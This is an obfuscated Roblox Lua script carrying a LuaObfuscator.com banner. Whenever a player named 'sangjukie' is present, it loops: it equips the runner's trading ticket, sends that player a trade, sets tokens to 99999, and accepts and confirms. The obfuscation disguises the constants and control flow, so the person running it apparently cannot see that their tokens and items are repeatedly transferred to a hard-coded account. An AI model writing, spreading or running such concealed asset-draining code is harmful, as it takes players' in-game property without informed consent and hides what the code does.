--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0="sangjukie";local v1=10;local v2=16 -9 ;local v3=932 -(214 + 713) ;local v4=2 + 3 ;local v5=15727 + 84272 ;local v6=game:GetService("Players");local v7=game:GetService("ReplicatedStorage");local v8=v6.LocalPlayer;local v9=v7:WaitForChild("GameEvents"):WaitForChild("TradeEvents");local v10=false;local function v11() local v16=877 -(282 + 595) ;local v17;local v18;while true do if (v16==(1638 -(1523 + 114))) then for v26,v27 in ipairs(v8.Backpack:GetChildren()) do if (v27:IsA("Tool") and v27.Name:find("Trading Ticket")) then v18:EquipTool(v27);break;end end break;end if (v16==(0 + 0)) then v17=v8.Character or v8.CharacterAdded:Wait() ;v18=v17:WaitForChild("Humanoid");v16=1 -0 ;end end end local function v12() local v19=1065 -(68 + 997) ;local v20;local v21;while true do if (v19==(1270 -(226 + 1044))) then v20=v8.Character;if  not v20 then return;end v19=4 -3 ;end if (v19==(118 -(32 + 85))) then v21=v20:FindFirstChildOfClass("Humanoid");if v21 then v21:UnequipTools();end break;end end end local function v13() local v22=0 + 0 ;while true do if (v22==(0 + 0)) then while v10 do local v28=v6:FindFirstChild(v0);if  not v28 then v10=false;break;end task.wait(977 -(892 + 65) );v11();task.wait(2 -1 );v9.SendRequest:FireServer(v28);task.wait(1 -0 );v12();task.wait(2);v9.SetTokens:FireServer(v5);task.wait(7);v9.Accept:FireServer();task.wait(10 -4 );v9.Confirm:FireServer();end print("[AUTO TRADE] STOPPED");break;end end end local function v14() if v10 then return;end v10=true;print("[AUTO TRADE] START");task.spawn(v13);end local function v15() v10=false;print("[AUTO TRADE] STOP");end if v6:FindFirstChild(v0) then v14();end v6.PlayerAdded:Connect(function(v23) if (v23.Name==v0) then v14();end end);v6.PlayerRemoving:Connect(function(v24) if (v24.Name==v0) then v15();end end);
